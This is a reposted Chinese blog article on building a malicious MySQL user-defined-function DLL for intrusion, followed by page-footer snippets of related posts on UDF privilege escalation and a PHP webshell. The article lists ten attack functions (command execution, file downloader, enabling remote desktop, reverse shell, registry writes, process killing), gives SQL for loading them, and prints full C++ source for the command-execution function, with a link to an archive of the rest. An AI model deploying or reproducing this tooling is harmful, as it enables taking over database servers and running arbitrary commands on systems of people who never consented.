mysql udf攻击_打造全功能MYSQL入侵UDF

最新推荐文章于 2024-04-25 20:47:12 发布
最新推荐文章于 2024-04-25 20:47:12 发布
阅读量198 收藏
点赞数
文章标签: mysql udf攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36039434/article/details/113297000
版权

打造全功能MYSQL入侵UDF文章作者:langouster

现在网上通过mysql获得系统权限大都通过MYSQL的用户函数接口UDF,比如Mix.dll和my_udf.dll。在Mix.dll中有一个MixConnect函数它会反弹shell,但是使用这个函数会造成MYSQL假死,前些天我就用这个函数反弹shell后由于网络原因不一会儿就断开了,造成了MYSQL当掉。my_udf.dll和Mix.dll相似,但它是通过my_udfdoor函数在服务器上侦听3306端口,用nc正向连接获得shell,但它的功能显的少了点,于是我决定自己写一个功能强大,运行稳定的UDF。MYSQL有一个开发包,它定义了自己的接口,变量类型,以及函数执行顺序。比如我们要写一个open3389函数,我们可以这样写:extern "C" __declspec(dllexport)my_bool open3389_init(UDF_INIT *initid, UDF_ARGS *args, char *message){//在open3389函数之前调用,一般用于初始化工作,为可选函数;//return 1出错 ,0 正常      return 0;}extern "C" __declspec(dllexport)char *open3389(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error){//真正实现功能的函数,必需函数;/*函数内容;return 结果;*/}extern "C" __declspec(dllexport)void open3389_deinit(UDF_INIT *initid){//在open3389函数之后调用,一般用于内存释放,可选函数;}以上的open3389函数的返回值是char *类型的,如果是其它类型函数的参数列表也会有所不同,具体的可见MYSQL参考手册。在写MYSQL UDF时另一个必须考虑的问题是程序的稳定时,它要经的起各种变态输入的考验,否则一旦程序出错MYSQL服务进程就会当掉。

以下是我写的UDF内容,它包含10个函数:cmdshell 执行cmd;downloader 下载者,到网上下载指定文件并保存到指定目录;open3389 通用开3389终端服务,可指定端口(不改端口无需重启);backshell 反弹Shell;ProcessView 枚举系统进程;KillProcess 终止指定进程;regread 读注册表;regwrite 写注册表;shut 关机,注销,重启;about 说明与帮助函数;

使用方法:创建函数:create function 函数名(区分大小写) returns string soname 'dll名' (注意路径);删除函数:delete function 函数名;使用函数:select 函数名(参数列表);获取参数信息可使用select 函数名("help");

以上几个函数都经过多次的测试(测试平台:MYSQL 5.0.24-community-nt、Windows XP),不太可能会造成MYSQL假死等现象,但也不排除在特殊环境,特殊输入的情况下出错的可能,如发现bug可通知我,QQ:185826531(langouster)//--------------------------------------------------------------------------源程序// MYSQL_UDF.cpp : 定义 DLL 应用程序的入口点。#include "stdafx.h"#include "stdio.h"#include #include #include #include #include #include "mysql.h"#include "resource.h"

#pragma comment(lib, "Urlmon.lib")HANDLE g_module;//--------------------------------------------------------------------------------------------------------------------------BOOL APIENTRY DllMain(HINSTANCE hModule,DWORD ul_reason_for_call,LPVOID lpReserved){   if(ul_reason_for_call==DLL_PROCESS_ATTACH)           g_module=hModule;    return TRUE;}//--------------------------------------------------------------------------------------------------------------------------cmdshellextern "C" __declspec(dllexport)my_bool cmdshell_init(UDF_INIT *initid, UDF_ARGS *args, char *message){//return 1出错 ,0 正常      initid->max_length=65*1024*1024;      return 0;}extern "C" __declspec(dllexport)char *cmdshell(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error){

if(args->arg_count!=1 || args->arg_type[0]!=STRING_RESULT || stricmp(args->args[0],"help")==0)      {           initid->ptr=(char *)malloc(200);           if(initid->ptr==NULL)return NULL;           strcpy(initid->ptr,"执行CMD Shell函数.\r\n例:select cmdshell(\"dir c:\\\\\");\r\n参数中的\"\\\"要用\"\\\\\"代替.");           *length=strlen(initid->ptr);           return initid->ptr;      }

int RunStatus=0;      char *cmdline,TempFilePath[MAX_PATH],ShellPath[MAX_PATH],temp[100];      DWORD size=0,len;      HANDLE hFile;

GetSystemDirectory(ShellPath,MAX_PATH-1);      strcat(ShellPath,"\\cmd.exe");      GetEnvironmentVariable("temp",TempFilePath,MAX_PATH-1);      strcat(TempFilePath,"\\2351213.tmp");

cmdline=(char *)malloc(strlen(args->args[0])+strlen(TempFilePath)+7);      strcpy(cmdline," /c ");      strcat(cmdline,(args->args)[0]);      strcat(cmdline,">");      strcat(cmdline,TempFilePath);

STARTUPINFO si;      PROCESS_INFORMATION pi;      ZeroMemory( &si, sizeof(si) );      si.wShowWindow=SW_HIDE;      si.cb = sizeof(si);      ZeroMemory( &pi, sizeof(pi) );      RunStatus=CreateProcess(ShellPath,cmdline,NULL,NULL,FALSE,0,0,0,&si,&pi);      free(cmdline);

if(!RunStatus)      {           itoa(GetLastError(),temp,10);           sprintf(temp,"Shell无法启动,GetLastError=%s\n",temp);           initid->ptr=(char *)malloc(strlen(temp)+1);           strcpy(initid->ptr,temp);           (*length)=strlen(initid->ptr);           return initid->ptr;      }

WaitForSingleObject(pi.hProcess,30000);

//获得结果      hFile=CreateFile(TempFilePath,GENERIC_READ,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL);      if(hFile!=INVALID_HANDLE_VALUE)      {           size=GetFileSize(hFile,NULL);           initid->ptr=(char *)malloc(size+100);           ReadFile(hFile,initid->ptr,size+1,&len,NULL);           (initid->ptr)[size]='\0';           strcat(initid->ptr,"\r\n--------------------------------------------完成!\r\n");

CloseHandle(hFile);           DeleteFile(TempFilePath);      }      else      {           initid->ptr=(char *)malloc(100);           strcpy(initid->ptr,"\r\n--------------------------------------------完成!\r\n");      }      (*length)=strlen(initid->ptr);      return initid->ptr;

}extern "C" __declspec(dllexport)void cmdshell_deinit(UDF_INIT *initid){      if(initid->ptr!=NULL)           free(initid->ptr);}篇幅关系,后面的代码省略,全部源代码在附件中。附件:http://www.langouster.com/upload/mysqludf.rar

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

祲入风
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Raven2-MySql udf提权
Demonering的博客
02-23 3908
0x01 信息收集 nmap扫描 nmap -A -T4 -p- 192.168.159.0/24 正在上传…重新上传取消 发现192.168.159.132开启了22、80、111、59992端口。 操作系统是linux、中间件是apache。 访问192.168.159.132的80端口 正在上传…重新上传取消 试下功能点,发现blog是用word press搭建的,但是页面显示不全,点击黑体大字Raven Security,发现了域名 raven.local 正在上传…重新上传取消
mysql中binlog_format模式与配置详细分析
09-09
对于一些特殊功能的函数,如果Slave端无法处理,MySQL会自动转为ROW格式记录binlog,以确保数据同步的准确性。 比较SBR和RBR模式的优缺点: **SBR优点**: - 技术成熟,历史久远。 - binlog文件小。 - 审计友好,...
mysql udf安全_打造全功能MYSQL入侵UDF
weixin_36193839的博客
02-07 87
现在网上通过mysql获得系统权限大都通过MYSQL的用户函数接口UDF,比如Mix.dll和my_udf.dll。在Mix.dll中有一个MixConnect函数它会反弹shell,但是使用这个函数会造成MYSQL假死,前些天我就用这个函数反弹shell后由于网络原因不一会儿就断开了,造成了MYSQL当掉。my_udf.dll和Mix.dll相似,但它是通过my_udfdoor函数在服务器上侦听...
mysql udf示例_MySQL提权之udf提权(示例代码)
weixin_39799307的博客
02-10 116
什么是udf提权?MySQL提供了一个让使用者自行添加新的函数的功能,这种用户自行扩展函数的功能就叫udf。它的提权原理也非常简单!即是利用了root 高权限,创建带有调用cmd的函数的udf.dll动态链接库!这样一来我们就可以利用 system权限进行提权操作了!当我们拿到webshell后,由于中间件,例如,apache使用了较低的权限,可能仅仅是个网络服务的权限,然后我们就需要进行提权,而...
mysql udf 提权 windows_Mysql UDF提权
weixin_30346025的博客
02-27 121
今天闲的无聊DEDECMS搞了几个站。没事做提权吧。真的很久很久没有玩这东西了。测试经典的UDF.dll提权一次性成功。dedecms的账号和密码都保存在data/common.inc.php里面;下载common.inc.php查看账号密码你懂的。首先用菜刀上传UDF.php;然后输入账号密码啥的也就连接成功了。作者:二、适用场合:1.目标系统是Windows(Win2000,XP,Win200...
linux环境下的MySQL UDF提权
黑战士的博客
04-25 1398
#1. 背景介绍###UDF(user defined function)用户自定义函数,是MySQL的一个扩展接口,称为用户自定义函数,是用来拓展MySQL的技术手段,用户通过自定义函数来实现在MySQL中无法实现的功能。文件后缀为.dll或.so,常用c语言编写。拿到一个WebShell之后,在利用操作系统本身存在的漏洞提权的时候发现补丁全部被修补。这个时候需要利用第三方应用提权。当MYSQL权限比较高的时候我们就可以利用udf提权。###利用前提mysqlfuncfunc。
mysql存储中的udf_MySQL提权之udf提权
weixin_39768083的博客
01-25 72
什么是udf提权?MySQL提供了一个让使用者自行添加新的函数的功能,这种用户自行扩展函数的功能就叫udf。它的提权原理也非常简单!即是利用了root 高权限,创建带有调用cmd的函数的udf.dll动态链接库!这样一来我们就可以利用 system权限进行提权操作了!当我们拿到webshell后,由于中间件,例如,apache使用了较低的权限,可能仅仅是个网络服务的权限,然后我们就需要进行提权,而...
Mysql提权方法总结系列-UDF提权
kracer的博客
02-27 2606
0x01 简介 UDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数,它是用来拓展MySQL的技术手段,可以说是数据库功能的一种扩展,用户通过自定义函数来实现MySQL中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,就像本机函数如ABS()或SOUNDEX()一样方便。UDF官方介绍以及其函数定义请参考链接。 0x01 当获取到mysql的root权限,需要进行权限提升,可以尝试使用udf提权。 1、条件判断 ① ...
MySQL提权】UDF提权(附带大马)
07-25 1747
Mysql提权】UDF
mysql linux udf提权,mysql udf提权原理和提权案例分析 udf提权木马下载
weixin_32538033的博客
05-03 299
本文将详细讲述udf提权的原理及具体方法 您可以使用下面提供的 langouster_udf.dll 专用网马(php)或者使用 php spider shell最新版(已去后门)--非常强大的PHP大马 里面的udf提权功能上传udf.php到目标站点访问 下面是udf提权马的界面进入之后.安装下面是这款udf.php提权马可以安装的function用法和说明一、功能:利用MYSQL的Cre...
MySQL实现类似于connect_by_isleaf的功能MySQL方法或存储过程
12-15
MySQL中,面对类似Oracle的`connect_by_isleaf`功能的需求,即查找并修改指定ID的所有子级记录,可以通过不同的方法来实现。由于MySQL没有内置的递归查询功能,我们通常需要利用临时表或者自连接来模拟递归。以下...
mysql面试题2023超全资源下载
05-16
UDF是由用户创建的函数,可以扩展MySQL的功能。 **19. 什么是触发器?** 触发器是一种数据库对象,会在特定事件(如INSERT、UPDATE、DELETE)发生时自动执行。 **20. 如何查看和分析MySQL的慢查询日志?** 通过...
Linux下的MySQL数据库编程_代码
12-16
MySQL是一个广泛使用的开源关系型数据库管理系统(RDBMS),它提供了强大的数据存储和管理功能。Linux作为服务器操作系统,与MySQL的结合使得数据处理更加高效和可靠。下面将详细讨论在Linux下使用MySQL进行数据库...
mysql高级参考课件(供实操参考).zip
01-18
- 用户定义函数(UDF):扩展MySQL功能,创建自定义函数以处理特定逻辑。 3. **触发器**: - 在特定事件(如INSERT, UPDATE, DELETE)发生时自动执行的代码段,常用于数据验证、日志记录或保持数据一致性。 4. **...
基于卷积神经网络的语音识别声学模型的研究
08-04
【项目资源】:包含前端、后端、移动开发、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源,毕业设计等各种技术项目的源码。包括C++、Java、python、web、C#、EDA等项目的源码。 【适用人群】:适用于希望学习不同技术领域的初学者或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。
VCD租借管理系统VB(源程序+论文).rar
08-04
VCD租借管理系统VB(源程序+论文)
嗖嗖移动大厅(Java)
08-04
嗖嗖移动大厅源码
android-studio-2022.3.1.22-windows.zip.001
最新发布
08-04
android-studio-2022.3.1.22-windows.zip.001 参考文档: https://blog.csdn.net/xzzteach/article/details/140911515 android-studio-2022.3.1.22-windows.zip.001 https://download.csdn.net/download/xzzteach/89614079 android-studio-2022.3.1.22-windows.zip.002 https://download.csdn.net/download/xzzteach/89614082 https://blog.csdn.net/xzzteach/article/details/140913786 【Android Studio】2022.3.1.22-windows版本(不要太新拒绝过老)安装使用一条龙教程(JDK1.8.0_201、API28(9)、gradle-6.5-all)
lib_mysqludf_sys_x64.dll
08-06
lib_mysqludf_sys_x64.dll是一个用于MySQL数据库的外部库文件。它是MySQL User-defined Function (UDF)的一部分,允许用户通过调用这个库文件中的函数来扩展MySQL服务器的功能。 lib_mysqludf_sys_x64.dll提供了一些操作系统级别的功能,例如文件和目录操作、执行外部命令和程序、读取系统环境变量等。通过在MySQL中创建自定义函数并使用这个库文件,用户可以在数据库中执行许多与操作系统相关的任务。 这个库文件是为64位系统编译的,所以只能在64位的MySQL服务器上使用。使用之前,需要将它加载到MySQL服务器中,并确保服务器和客户端的版本兼容性。 加载lib_mysqludf_sys_x64.dll的方法是通过在MySQL的配置文件中添加一行配置信息,指定库文件的路径。然后,重启MySQL服务器以使配置生效。 一旦加载成功,用户就可以在自己的数据库中创建自定义函数,通过调用这个库文件中的函数来实现特定的操作系统级别的功能。比如,可以创建一个函数来执行一个外部命令,然后将结果存储到数据库中。这样,用户就可以在数据库中操作文件、目录和其他操作系统资源。 总的来说,lib_mysqludf_sys_x64.dll是一个用于MySQL数据库的外部库文件,它扩展了MySQL服务器的功能,允许用户在数据库中执行一些操作系统级别的任务。它通过创建自定义函数并使用库文件中的函数来实现这些功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值